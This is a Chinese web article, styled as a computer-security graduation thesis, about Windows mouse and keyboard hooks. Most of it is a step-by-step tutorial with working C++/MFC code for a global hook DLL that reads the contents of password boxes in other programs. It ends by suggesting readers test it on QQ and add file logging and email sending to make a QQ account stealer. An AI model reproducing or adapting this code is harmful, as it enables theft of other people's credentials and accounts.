学习啦 > 论文大全 > 学科论文 > 计算机论文 > 计算机安全毕业论文:利用鼠标键盘钩子截获密码

计算机安全毕业论文:利用鼠标键盘钩子截获密码

时间: 谢桦657 分享

计算机安全毕业论文:利用鼠标键盘钩子截获密码

学习啦在线学习网   钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。以下是学习啦小编今天为大家精心准备的计算机安全毕业论文范文:利用鼠标键盘钩子截获密码。内容仅供参考,欢迎阅读!

  利用鼠标键盘钩子截获密码全文如下:

  钩子能截获系统并得理发送给其它应用程序的消息,能完成一般程序无法完成的功能。掌握钩子的编程方法是很有必要的

  钩子分类 :

学习啦在线学习网   1、WH_CALLWNDPROC和WH_CALLWNDPROCRET: 使你可以监视发送到窗口过程的消息

  3、WH_DEBUG 调试钩子

学习啦在线学习网   4、WH_FOREGROUNDIDLE 当当应用程序的前台线程大概要变成空闲状态时,系统就会调用 WH_FOREGROUNDIDL

学习啦在线学习网   5、WH_JOURNALRECORD 监视和记录输入事件

学习啦在线学习网   6、WH_JOURNALPLAYBACK 回放用WH_JOURNALRECORD记录事件

  7、WH_KEYBOARD 键盘钩子

  9、WH_KEYBOARD_LL 低层键盘钩子

  10、WH_MOUSE 鼠标钩子

学习啦在线学习网   11、WH_MOUSE_LL 底层鼠标钩子

  12、WH_SHELL 外壳钩子

  13、WH_MSGFILTER 和 WH_SYSMSGFILTER 使我们可以监视菜单,滚动条,消息框等

  安装钩子:

  调用函数SetWindowsHookEx安装钩子。其函数原型为:

  HHOOK SetWindowsHookEx( int idHook,HOOKPROC lpfn, INSTANCE hMod,DWORD dwThreadId )

学习啦在线学习网   idHook表示钩子类型,它是和钩子函数类型一一对应的。如,WH_KEYBOARD,WH_MOUSE。

  Lpfn是钩子函数的地址。

学习啦在线学习网   HMod是钩子函数所在的实例的句柄。对于线程钩子,该参数为NULL;对于系统钩子,该参数为钩子函数所在的DLL句柄。 (系统钩子必须在DLL中)

学习啦在线学习网   dwThreadId 指定钩子所监视的线程的线程号。对于全局钩子,该参数为NULL。

  SetWindowsHookEx返回所安装的钩子句柄。

  卸载钩子

  调用函数 BOOL UnhookWindowsHookEx( HHOOK hhk)卸载钩子

  定义钩子函数

学习啦在线学习网   钩子函数是一种特殊的回调函数。钩子监视的特定事件发生后,系统会调用钩子函数进行处理。一般为下:

学习啦在线学习网   LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM lParam)

  参数wParam和 lParam包含所钩消息的信息,比如鼠标位置、状态,键盘按键等。nCode包含有关消息本身的信,比如是否从消息队列中移出。

  实例:

  下面我们通过安装鼠标钩子。和键盘钩子还截获输入的密码,并可查看*密码为例,来说明何何使用钩子。

  1,进入向导,新建MFC AppWizard(dll) 取名为GetPass,选择MFC Extension DLL,完成。

学习啦在线学习网   2,新建一个CGetPassHook 类,基类:CObject,并加入StartHook,StopHook,函数,如下:

  class AFX_EXT_CLASS CGetPassHook : public CObject

  {

  public:

学习啦在线学习网   BOOL StopHook();

  BOOL StartHook(HWND hwnd);

  CGetPassHook();

  virtual ~CGetPassHook();

  };

  3:加入全局共享数据,如下:

  #pragma data_seg("ShareData")

学习啦在线学习网   HHOOK hKeyBoardHook=NULL; file://keyboar hook

  HHOOK hMouseHook=NULL; file://mouse hook

  HINSTANCE glhInstance=NULL; file://globle instance

  HWND hOutPutWnd=NULL; file://Display Pass Wnd

  #pragma data_seg()

学习啦在线学习网   4:加入鼠标,键盘钩子处理函数,如下:

  LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM lParam)

  { file://鼠标钩子得理函数

  LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT FAR*)lParam;

学习啦在线学习网   if(nCode>=0)

  {

学习啦在线学习网   HWND hTargetHwnd=lpMouse->hwnd; file://得到鼠标所在窗口句柄

  if(hTargetHwnd)

  {

学习啦在线学习网   LONG style=::GetWindowLong(hTargetHwnd,GWL_STYLE); file://得到它的样式

学习啦在线学习网   if(style&ES_PASSWORD) file://如果是密码框

  {

  char szPass[255];

  ::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);

  file://得到密码

  ::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);

学习啦在线学习网   file://显示密码

  }

  }

  }

学习啦在线学习网   return CallNextHookEx(hMouseHook,nCode,wParam,lParam);

学习啦在线学习网   file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,

  file://可以起到截儿消息的目的,我们这里调用之。

  }

学习啦在线学习网   LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM lParam)

  { file://keyboard hook proc

学习啦在线学习网   if(nCode>=0)

  {

  HWND hTargetHwnd=GetActiveWindow(); file://get active window

  if(hTargetHwnd)

  EnumChildWindows(hTargetHwnd,EnumWndProc,0); file://枚举所有窗口

  }

  return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);

  file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,

学习啦在线学习网   file://可以起到截儿消息的目的,我们这里调用之。

  }

学习啦在线学习网   这里要介绍下EnumChildWindows函数,原形如下:

  BOOL EnumChildWindows(HWND hWndParent,WINDENUMPROC lpEnumFunc,LPARAM lParam);

  hWndParent:为枚举窗口的句柄

  lpEnumFunc:枚举函数的地址,

  lParam:这里为0

  5:加入枚举窗口的函数。如下:(注意,因为前面的函数据要用到此函数,所以要么在前面声明,要么放在上面函数之前定义。

学习啦在线学习网   BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam)

学习啦在线学习网   { file://enum the child window,find passedit

  if(hwnd)

  {

学习啦在线学习网   LONG style=::GetWindowLong(hwnd,GWL_STYLE); file://得到STYLE

  if(style&ES_PASSWORD) file://是密码框

  {

学习啦在线学习网   char szPass[255];

  ::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); file://得到PASS

  ::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); file://显示

  return TRUE;

  }

  }

学习啦在线学习网   return TRUE;

  }

学习啦在线学习网   6:在DEF文件中定义段属性: (这步很重要)

  SECTIONS

学习啦在线学习网   mydata READ WRITE SHARED

  7:完成StartHook,StopHook函数,启动/关闭钩子,如下:

学习啦在线学习网   BOOL CGetPassHook::StartHook(HWND hwnd)

学习啦在线学习网   { file://install hoook

  hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);

  file://mouse hook

  hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);

  file://keyboard hook

  if(hMouseHook&&hKeyBoardHook)

  {

学习啦在线学习网   hOutPutWnd=hwnd; file://显示密码的句柄

  return TRUE;

  }

  return FALSE;

  }

学习啦在线学习网   BOOL CGetPassHook::StopHook()

  { file://unstall hook

  BOOL mHook=UnhookWindowsHookEx(hMouseHook);

  BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);

  if(mHook&&kHook)

学习啦在线学习网   return TRUE;

学习啦在线学习网   return FALSE;

  }

  8:在DLLMAIN函数中得到DLL句柄,要用到glhInstance变量,因此要加入一句,如下:

学习啦在线学习网   extern HINSTANCE glhInstance; file://记得这里

学习啦在线学习网   extern "C" int APIENTRY

学习啦在线学习网   DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)

  {

  UNREFERENCED_PARAMETER(lpReserved);

学习啦在线学习网   if (dwReason == DLL_PROCESS_ATTACH)

  {

  TRACE0("GETPASS.DLL Initializing!n");

  if (!AfxInitExtensionModule(GetPassDLL, hInstance))

  return 0;

学习啦在线学习网   new CDynLinkLibrary(GetPassDLL);

学习啦在线学习网   glhInstance=hInstance; file://得到句柄

  }

学习啦在线学习网   else if (dwReason == DLL_PROCESS_DETACH)

  {

  TRACE0("GETPASS.DLL Terminating!n");

  AfxTermExtensionModule(GetPassDLL);

  }

  return 1; // ok

  }

  9:编译,完成DLL部分,

学习啦在线学习网   下面建立APP部分。如下:

  1:新建MFC AppWizard(exe)命名为GetPassWord,并在第一步中选择Add to Current WorkSpace加入到当前工作区,这样方便。

学习啦在线学习网   2:将刚才的DLL中的GetPass.lib,和GetPassHook.h拷贝APP所在目录,然后Project->Add to Project-->Files

  选择这两个文件。

学习啦在线学习网   2:在主对话框中,加入一个EDIT,ID 为IDC_EDIT_PASS

学习啦在线学习网   3:在CGetPassWordDlg.h中包含GetPassHook.h文件,声明一个对象。如下:

  #include "GetPassHook.h"

  class CGetPassWordDlg : public CDialog

  {

  protected:

学习啦在线学习网   CGetPassHook m_hook;

  。。。

学习啦在线学习网   DECLARE_MESSAGE_MAP()

  };

  4:在实现文件中:OnInitDialog()中起动HOOK

  BOOL CGetPassWordDlg::OnInitDialog()

  {

学习啦在线学习网   CWnd *pWnd=GetDlgItem(IDC_EDIT_PASS);

  m_hook.StartHook(pWnd->GetSafeHwnd()); file://install hook

学习啦在线学习网   return TRUE; // return TRUE unless you set the focus to a control

  }

  5:加入WM_DESTROY消息,在退出程序时停止HOOK,如下:

  void CGetPassWordDlg::OnDestroy()

  {

  CDialog::OnDestroy();

学习啦在线学习网   m_hook.StopHook(); file://stop hook

  }

学习啦在线学习网   6:将GetPass.dll拷贝到。EXE一个目录下,

  7:编译,运行.

  这样,你在输入任何密码框输入密码时,密码都将截获。就算键盘HOOK失效,移动鼠标到密码框,也都获取*号密码,因为我们安装两个HOOK。启动QQ,输入密码,试下看是否已经截获了密码?将本程序稍做修改,将截获的密码输出到文件,并加入发送邮件攻能,一个QQ盗号器就做成了。

399530